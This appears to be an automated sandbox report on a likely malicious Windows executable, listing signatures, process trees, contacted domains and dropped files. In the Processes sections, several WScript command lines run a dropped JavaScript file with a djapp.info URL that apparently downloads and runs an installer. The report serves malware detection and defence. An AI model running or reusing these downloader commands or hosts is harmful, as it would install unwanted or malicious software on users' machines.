Malware Analysis Report

2025-01-18 02:35

Sample ID 240613-bq1mvaserq
Target a3578237b4c2099fce51877bea51b575_JaffaCakes118
SHA256 4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158
Tags: execution
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256

4e72ecde6fc0994b4fb69adb5de8414e82e6ed2200d1ab95f90f4f67870a4158

Threat Level: Likely malicious

The file a3578237b4c2099fce51877bea51b575_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 01:21

Reported

2024-06-13 01:24

Platform

win7-20240611-en

Max time kernel

121s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1704 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf7407.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf7407.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 564

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.18.7.81:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.18.7.81:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.18.7.81:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 8.8.8.8:53 bi.downthat.com udp
US 3.94.41.167:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 104.26.6.37:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf7407.js

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\A7BJXE3M.txt

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\Local\Temp\CabBC4D.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm

C:\Users\Admin\AppData\Local\Temp\TarD4DD.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8DU897P\domain_profile[1].htm

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z5LT06Y3\domain_profile[1].htm

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 01:21

Reported

2024-06-13 01:24

Platform

win10v2004-20240508-en

Max time kernel

100s

Max time network

90s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 3712 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a3578237b4c2099fce51877bea51b575_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js" http://www.djapp.info/?domain=YPwbArbcgo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4DB2.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3712 -ip 3712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 1452

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 www.djapp.info udp

Files

C:\Users\Admin\AppData\Local\Temp\fuf4DB2.js
